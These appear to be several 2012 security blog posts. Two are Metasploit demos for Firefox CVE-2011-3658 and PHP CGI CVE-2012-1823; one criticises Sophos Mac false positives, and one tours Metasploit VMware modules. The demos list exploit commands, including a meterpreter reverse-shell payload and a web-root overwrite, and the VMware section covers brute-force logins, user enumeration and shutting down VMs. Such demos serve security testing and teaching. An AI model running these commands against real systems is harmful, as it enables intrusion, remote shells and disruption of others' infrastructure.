CVE-2011-3658 Firefox 7/8 nsSVGValue Vulnerability Metasploit Demo

Exploits, Metasploit,

Timeline :

Vulnerability discovered by regenrecht
Vulnerability reported by regenrecht to ZDI
Vulnerability reported to the vendor by ZDI the 2011-12-01
Coordinated public release of the vulnerability the 2011-12-20
Metasploit PoC provided the 2012-05-07

PoC provided by :

regenrecht
Lincoln
corelanc0d3r

Reference(s) :

CVE-2011-3658
OSVDB-77953
MFSA-2011-55

Affected version(s) :

Mozilla Firefox before version 9.0
Mozilla Firefox before version 3.6.28
Mozilla Thunderbird before version 9.0
Mozilla SeaMonkey before version 2.6

Tested on Windows XP Pro SP3 with :

Mozilla Firefox before version 7.0.1

Description :

This metasploit module is quiet unstable and exploitation is random.

This module exploits an out-of-bounds access flaw in Firefox 7 and 8. The notification of nsSVGValue observers via nsSVGValue::NotifyObservers(x,y) uses a loop which can result in an out-of-bounds access to attacker-controlled memory. The mObserver ElementAt() function (which picks up pointers), does not validate if a given index is out of bound. If a custom observer of nsSVGValue is created, which removes elements from the original observer, and memory layout is manipulated properly, the ElementAt() function might pick up an attacker provided pointer, which can be leveraged to gain remote arbitrary code execution.

Commands :

use exploit/windows/browser/mozilla_nssvgvalue
set SRVHOST 192.168.178.100
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST 192.168.178.100
exploit

getuid
sysinfo

10 of 10 malwares detected by Mac Sophos Anti-Virus are false positives. Does yours?

Various, , ,

On April 24, Sophos Naked Security blog had publish a post regarding malware infections on Mac OS X. Sophos has claim that 20% of Mac computers where carrying one or more instances of Windows malwares. All these malwares where detected though they’re free Sophos Anti-Virus for Mac Home Edition.

Flashback malware was the big story of April for Mac consumers and all anti-virus company have jump on this opportunity to promote they’re products and to distill propaganda around Mac OS X security. I agree with them Mac OS X is a product like other product, and Mac OS X has also to be protected against threats, but the proposed solutions are worse than to do nothing.

 

During my tests of Sophos Anti-Virus for Mac Home Edition 10 of 10 malwares detected by the anti-virus were false positives harassing me with constant alert pop-up during regular operations, Spotlight indexing, Time Machine backup. Here under a sample of 10 infections detected by Sophos Anti-Virus for Mac.

Perl/FtpExp-A

False positives due to binary format of the “affected” files.

/Users/xxxx/Library/Saved Application State/com.twitter.twitter-mac.savedState/window_1.data
/Users/xxxx/Library/Preferences/Macromedia/Flash Player/macromedia.com/support/flashplayer/sys/#s.ytimg.com/settings.sol

Troj/BredoZp-JO

Sophos him self is a trojan, and some iTunes applications and Chrome are backdoored and nobody known about it.

/Library/Preferences/com.sophos.sav.plist
/Users/xxxx/Music/iTunes/iTunes Media/Mobile Applications/iSSH 5.3.1.ipa
/Users/xxxx/Library/Saved Application State/com.google.Chrome.savedState/windows.plist

Troj/BredoZp-JN

iTunes is a very well-known backdoored software and one more time Sophos him self contain a trojan.

/Users/xxxx/Library/Caches/com.apple.iTunes/goog-phish-shavar.db
/Library/Preferences/com.sophos.sav.plist

Troj/Iframe-HY

One more time Sophos is a trojan, and now my Spotlight indexed files are also containing backdoor.

/Library/Preferences/com.sophos.sav.plist,
/Volumes/xxxx/.Spotlight-V100/Store-V2/700BF07C-170F-482E-A2BB-45EF8501935C/0.indexPostings

Mal/IRCBot-O 

VLC is containing an IRC bot, gotcha remote control of all VLC users.

/Applications/VLC.app/Contents/Resources/English.lproj/InfoPlist.strings

Troj/PhpShell-Z

One more time VLC how is containing a PHP trojan …

/Applications/VLC.app/Contents/Resources/English.lproj/InfoPlist.strings

Mal/PHPShell-A 

Everybody know that Sophos Anti-Virus products are developed in PHP.

/Library/Preferences/com.sophos.sav.plist

Troj/PDFJs-B 

Help my logs are containing trojans and Sophos one more time.

/private/var/log/DiagnosticMessages/2012.05.05.asl
/Library/Preferences/com.sophos.sav.plist

Mal/Badsrc-C

My Spotlight indexing has a dead malware…

/.Spotlight-V100/Store-V2/DeadFiles/orphan.ef786332/0000/0000/0151/22087716.txt

Troj/PhoexRef-A

Hu my screenshot of Metasploit are containing trojans (why not, lol) and Google drive is backdoored.

/Users/xxxx/Desktop/screenshots/metasploit-vmware-modules-research.png
/Users/xxxx/Library/Application Support/Google/Drive/sync_config.db
/usr/share/zoneinfo/UTC
/Library/Preferences/com.sophos.sav.plist

In conclusion Sophos is more strong to do marketing and give fear to consumers than to create a good Mac anti-virus that really detect something.

CVE-2012-1823 PHP CGI Argument Injection Metasploit Demo

Exploits, Metasploit

Timeline :

Vulnerability discovered at Nullcon Hackim 2012 by eindbazen the 2012-01-13
Vulnerability reported to the vendor the 2012-01-17
Vulnerability accidentally disclosed on PHP bug tracking system the 2012-05-03
Coordinated public release of the vulnerability the 2012-05-03
Metasploit PoC provided the 2012-05-04

PoC provided by :

egypt
hdm

Reference(s) :

CVE-2012-1823
OSVDB-81633

Affected version(s) :

PHP versions before 5.3.12
PHP versions before 5.4.2

Tested on CentOS release 6.2 (Final) with :

php-common and php-cli 5.3.3-3.el6_2.6 at Fri Feb 3 00:35:09 2012

Description :

When run as a CGI, PHP up to version 5.3.12 and 5.4.2 is vulnerable to an argument injection vulnerability. This module takes advantage of the -d flag to set php.ini directives to achieve code execution. From the advisory: “if there is NO unescaped ‘=’ in the query string, the string is split on ‘+’ (encoded space) characters, urldecoded, passed to a function that escapes shell metacharacters (the “encoded in a system-defined manner” from the RFC) and then passes them to the CGI binary.”

Note : This vulnerability was potentially exploited in the wild for at least 8 years !

Commands :

use exploit/multi/http/php_cgi_arg_injection
set RHOST 192.168.178.210
set TARGETURI /phpinfo.php
set PAYLOAD php/exec
set CMD echo \"owned\">/var/www/html/owned.html
exploit

Metasploit VMware Auxiliary Modules

Metasploit, ,

Metasploit provide some VMware auxiliary modules who will permit you to fingerprint, gather information’s, enumerate users/groups/permissions, enumerate or terminate user administrative sessions, enumerate virtual machines hosted on ESX/ESXi and power on/off virtual machines.

You can find all these auxiliary modules through the Metasploit search command.

VMWare ESX/ESXi Fingerprint Scanner (esx_fingerprint)

To invoke this auxiliary module just type the following command :

This module attempt try to access to VMware ESX/ESXi Web API interfaces and attempts to identify the running version of ESX/ESXi. Web API interfaces are running on port 443/TCP with “/sdk” default URL, also all connections are encrypted in SSL.

You can run this module against multiple hosts by defining the “RHOSTS” variable. “RHOSTS” variable could be a unique IP address, an IP addresses range (ex : 192.168.1.0-192.168.1.255, or 192.168.1.0/24) or a file (ex : file:/tmp/ip_addresses.txt). Also in order to parallelize brute force attempts, just increase the number of concurrent threads by setting the “THREADS” variable.

VMWare Authentication Daemon Version Scanner (vmauthd_version)

To invoke this auxiliary module just type the following command :

This module will gather information’s about an ESX/ESXi host through the vmauthd service on port 902/TCP.

You can run this module against multiple hosts by defining the “RHOSTS” variable. “RHOSTS” variable could be a unique IP address, an IP addresses range (ex : 192.168.1.0-192.168.1.255, or 192.168.1.0/24) or a file (ex : file:/tmp/ip_addresses.txt). Also in order to parallelize brute force attempts, just increase the number of concurrent threads by setting the “THREADS” variable.

VMWare Web Login Scanner (vmware_http_login)

To invoke this auxiliary module just type the following command :

This module attempts to authenticate to the VMWare HTTP service for VmWare Server, ESX, and ESXi.

You can run this module against multiple hosts by defining the “RHOSTS” variable. “RHOSTS” variable could be a unique IP address, an IP addresses range or a file. This module is also attempting to authenticate using username and password combinations indicated by the “USER_FILE“, “PASS_FILE“, and “USERPASS_FILE” options. You can use SkullSecurity password lists. Also in order to parallelize brute force attempts, just increase the number of concurrent threads by setting the “THREADS” variable.

All valid user and password combinations are in green, invalid login are in red.

VMWare Authentication Daemon Login Scanner (vmauthd_login)

To invoke this auxiliary module just type the following command :

This module will test vmauthd logins on a range of machines and report successful logins.

You can run this module against multiple hosts by defining the “RHOSTS” variable. “RHOSTS” variable could be a unique IP address, an IP addresses range or a file. This module is also attempting to authenticate using username and password combinations indicated by the “USER_FILE“, “PASS_FILE“, and “USERPASS_FILE” options. You can use SkullSecurity password lists. Also in order to parallelize brute force attempts, just increase the number of concurrent threads by setting the “THREADS” variable.

All valid user and password combinations are in green, invalid login are in red.

 

VMWare Enumerate Host Details (vmware_host_details)

To invoke this auxiliary module just type the following command :

This module attempts to enumerate information about the host systems through the VMWare web API.

You can run this module against multiple hosts by defining the “RHOSTS” variable. “RHOSTS” variable could be a unique IP address, an IP addresses range or a file. You have to provide a valid “USERNAME” and “PASSWORD“. In order to parallelize brute force attempts, just increase the number of concurrent threads by setting the “THREADS” variable. Also, you can enumerate hardware details of the host by setting the “HW_DETAILS” option to “true“.

VMWare Enumerate User Accounts (vmware_enum_users)

To invoke this auxiliary module just type the following command :

This module will log into the Web API of VMWare and try to enumerate all the user accounts. If the VMware instance is connected to one or more domains, it will try to enumerate domain users as well.

You can run this module against multiple hosts by defining the “RHOSTS” variable. “RHOSTS” variable could be a unique IP address, an IP addresses range or a file. You have to provide a valid “USERNAME” and “PASSWORD“. Also, in order to parallelize brute force attempts, just increase the number of concurrent threads by setting the “THREADS” variable.

VMWare Enumerate Permissions (vmware_enum_permissions)

To invoke this auxiliary module just type the following command :

This module will log into the Web API of VMWare and try to enumerate all the user/group permissions. Unlike “vmware_enum_users” auxiliary module this is only users and groups that specifically have permissions defined within the VMware product.

You can run this module against multiple hosts by defining the “RHOSTS” variable. “RHOSTS” variable could be a unique IP address, an IP addresses range or a file. You have to provide a valid “USERNAME” and “PASSWORD“. Also, in order to parallelize brute force attempts, just increase the number of concurrent threads by setting the “THREADS” variable.

VMWare Enumerate Active Sessions (vmware_enum_sessions)

To invoke this auxiliary module just type the following command :

This module will log into the Web API of VMware and try to enumerate all the login sessions.

You can run this module against multiple hosts by defining the “RHOSTS” variable. “RHOSTS” variable could be a unique IP address, an IP addresses range or a file. You have to provide a valid “USERNAME” and “PASSWORD“. Also, in order to parallelize brute force attempts, just increase the number of concurrent threads by setting the “THREADS” variable.

Unfortunately this module is not working with VMware ESXi 5.0

VMWare Terminate ESX Login Sessions (terminate_esx_sessions)

To invoke this auxiliary module just type the following command :

This module will log into the Web API of VMWare and try to terminate user login sessions as specified by the session keys.

You can run this module against one host by defining the “RHOST” variable. You have to provide a valid “USERNAME” and “PASSWORD“. Also you have to provide a session key identified by the previous “vmware_enum_sessions” auxiliary module by defining the “KEYS” variable.

Unfortunately this module is not working with VMware ESXi 5.0

VMWare Enumerate Virtual Machines (vmware_enum_vms)

To invoke this auxiliary module just type the following command :

This module attempts to discover virtual machines on any VMWare instance running the web interface. This would include ESX/ESXi and VMWare Server.

You can run this module against multiple hosts by defining the “RHOSTS” variable. “RHOSTS” variable could be a unique IP address, an IP addresses range or a file. You have to provide a valid “USERNAME” and “PASSWORD“. Also, in order to parallelize brute force attempts, just increase the number of concurrent threads by setting the “THREADS” variable. By defining the “SCREENSHOT” variable, the auxiliary module will try to take a screenshot of the running VM.

VMWare Power On Virtual Machine (poweron_vm)

To invoke this auxiliary module just type the following command :

This module will log into the Web API of VMWare and try to power on a specified Virtual Machine.

You can run this module against one host by defining the “RHOST” variable. You have to provide a valid “USERNAME” and “PASSWORD“. Also you have to provide a virtual machine name identified by the previous “vmware_enum_vms” auxiliary module by defining the “VM” variable (for example : set VM CentOS 5.8 i386).

VMWare Tag Virtual Machine (tag_vm)

To invoke this auxiliary module just type the following command :

This module will log into the Web API of VMWare and ‘tag’ a specified Virtual Machine. It does this by logging a user event with user supplied text.

You can run this module against one host by defining the “RHOST” variable. You have to provide a valid “USERNAME” and “PASSWORD“. You have to provide a virtual machine name identified by the previous “vmware_enum_vms” auxiliary module by defining the “VM” variable (for example : set VM CentOS 5.8 i386). Also you have to provide a message through the “MSG” variable.

VMWare Power Off Virtual Machine (poweroff_vm)

To invoke this auxiliary module just type the following command :

This module will log into the Web API of VMWare and try to power off a specified Virtual Machine.

You can run this module against one host by defining the “RHOST” variable. You have to provide a valid “USERNAME” and “PASSWORD“. Also you have to provide a virtual machine name identified by the previous “vmware_enum_vms” auxiliary module by defining the “VM” variable (for example : set VM CentOS 5.8 i386).